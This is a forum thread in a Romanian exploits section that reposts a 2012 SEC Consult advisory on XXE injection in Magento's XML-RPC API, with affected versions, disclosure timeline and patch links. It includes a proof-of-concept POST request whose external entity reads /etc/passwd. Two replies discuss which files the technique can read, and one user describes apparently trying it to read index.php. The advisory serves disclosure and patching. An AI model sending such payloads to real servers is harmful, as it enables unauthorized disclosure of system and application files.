Jump to content
Nytro

Magento eCommerce Platform XXE Injection

By Nytro, in Exploituri

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted

Magento eCommerce Platform XXE Injection

Authored by Kestutis Gudinavicius | Site sec-consult.com

Magento eCommerce platform uses a vulnerable version of Zend framework which is prone to XML eXternal Entity Injection attacks. The SimpleXMLElement class of Zend framework (SimpleXML PHP extension) is used in an insecure way to parse XML data. External entities can be specified by adding a specific DOCTYPE element to XML-RPC requests. By exploiting this vulnerability an application may be coerced to open arbitrary files and/or TCP connections.

SEC Consult Vulnerability Lab Security Advisory < 20120712-0 >
=======================================================================
              title: Local file disclosure via XXE injection
            product: Magento eCommerce Platform
                     Enterprise & Community Edition
 vulnerable version: Magento eCommerce Platform Enterprise Edition <= v1.12.0.1
                     Magento eCommerce Platform Community Edition <= v1.7.0.1

      fixed version: Magento eCommerce Platform Enterprise Edition <= v1.12.0.2
                     Magento eCommerce Platform Community Edition <= v1.7.0.2
             impact: Critical
           homepage: http://www.magentocommerce.com/
              found: 2012-06-18
                 by: K. Gudinavicius
                     SEC Consult Vulnerability Lab
                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"Magento eCommerce Platforms provide the scalability, flexibility and features
for business growth. Magento provides feature-rich eCommerce platforms that
offer merchants complete flexibility and control over the presentation,
content, and functionality of their online channel."

Source: http://www.magentocommerce.com/product/features



Vulnerability overview/description:
-----------------------------------
Magento eCommerce platform uses a vulnerable version of Zend framework which
is prone to XML eXternal Entity Injection attacks. The SimpleXMLElement class
of Zend framework (SimpleXML PHP extension) is used in an insecure way to
parse XML data.  External entities can be specified by adding a specific
DOCTYPE element to XML-RPC requests. By exploiting this vulnerability an
application may be coerced to open arbitrary files and/or TCP connections.



Proof of concept:
-----------------
Magento uses a vulnerable Zend_XmlRpc_Server() class (Zend\XmlRpc\Server.php)
to handle XML-RPC requests. Hence it is possible to disclose arbitrary local
files from the remote system. The following HTTP POST request to the
vulnerable XmlRpc server application illustrates the exploitation of this
vulnerability:

POST /index.php/api/xmlrpc HTTP/1.1
Host: $host

<?xml version="1.0"?>
 <!DOCTYPE foo [
  <!ELEMENT methodName ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<methodCall>
  <methodName>&xxe;</methodName>
</methodCall>



Vulnerable / tested versions:
-----------------------------
Magento eCommerce Platform Enterprise Edition v1.10.1.1
Magento eCommerce Platform Community Edition v1.7.0.0 & v1.7.0.1

Earlier versions are probably affected too!


Vendor contact timeline:
------------------------
2012-06-18: Contacting vendor through the contact form on the webpage as no email
            addresses or security contacts are to be found
            http://www.magentocommerce.com/company/contact-us
2012-06-20: No reply so far, hence trying again by choosing a different contact
            reason.
2012-06-21: Creating a bug tracking entry, asking for security contact
            http://www.magentocommerce.com/bug-tracking.
2012-06-21: Vendor reply: security@magento.com should be used.
2012-06-22: Sending advisory draft.
2012-06-22: Vendor reply: Testing workaround for customers to disable XMLRPC
            functionality, patch in progress; vendor will improve website to
            provide a clearer, more direct method for researchers.
2012-06-25: Asking for affected versions and release timeline.
2012-06-26: Informing Magento about Zend framework advisory.
2012-06-27: Vendor: sending more information to SEC Consult soon.
2012-07-04: Asking vendor about status.
2012-07-05: Vendor releases new versions and patches.
2012-07-12: SEC Consult releases detailed advisory.



Solution:
---------
Magento Community Edition

* 1.7.0.0+ - Upgrade to the latest version, currently v1.7.0.2:
  http://www.magentocommerce.com/download

* 1.4.0.0 - 1.4.1.1 - Apply the patch
  http://www.magentocommerce.com/downloads/assets/1.7.0.2/CE_1.4.0.0-1.4.1.1.patch

* 1.4.2.0 - Apply the patch
  http://www.magentocommerce.com/downloads/assets/1.7.0.2/CE_1.4.2.0.patch

* 1.5.0.0 - 1.7.0.1 - Apply the patch
  http://www.magentocommerce.com/downloads/assets/1.7.0.2/CE_1.5.0.0-1.7.0.1.patch

Magento Enterprise Edition

* 1.12.0.0+ - Upgrade to the latest version, currently v1.12.0.2:
  https://www.magentocommerce.com/products/customer/account/index/

* 1.8.0.0 – 1.11.X.X - Apply the Zend Security Upgrades patch
  https://www.magentocommerce.com/products/customer/account/index/

Magento Professional Edition

* All versions - Apply the Zend Security Upgrades patch
  https://www.magentocommerce.com/products/customer/account/index/

More information can be found at:
http://www.magentocommerce.com/blog/comments/update-zend-framework-vulnerability-security-update/



Workaround:
-----------
Detailed steps can be found at:
http://www.magentocommerce.com/blog/comments/update-zend-framework-vulnerability-security-update/



Advisory URL:
-------------
https://www.sec-consult.com/en/advisories.html


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH

Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
https://www.sec-consult.com

EOF K. Gudinavicius, J. Greil / @2012

Sursa: Magento eCommerce Platform XXE Injection ? Packet Storm

SirGod Contributor

SirGod

Posted
Posted

Ce fisiere ai incercat sa citesti? Poti citi doar ce poate apache/www citi. De obicei toate fisierele din directorul htdocs/www + cateodata si altele (depinde de permisiunile setate de catre sysadmin si din moment ce citesti etc/passwd probabil poti citi si alte fisiere de sistem).

cyadron Newbie

cyadron

Posted
Posted

Stiu ca asa ar trebui dar totusi imi da eroare daca incerc sa citesc de exemplu index.php. Stiu ca fisierul exista pentru ca pot de exemplu sa citesc din acelasi folder .htaccess. Eroarea care o am este 631 - failed to parse request.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...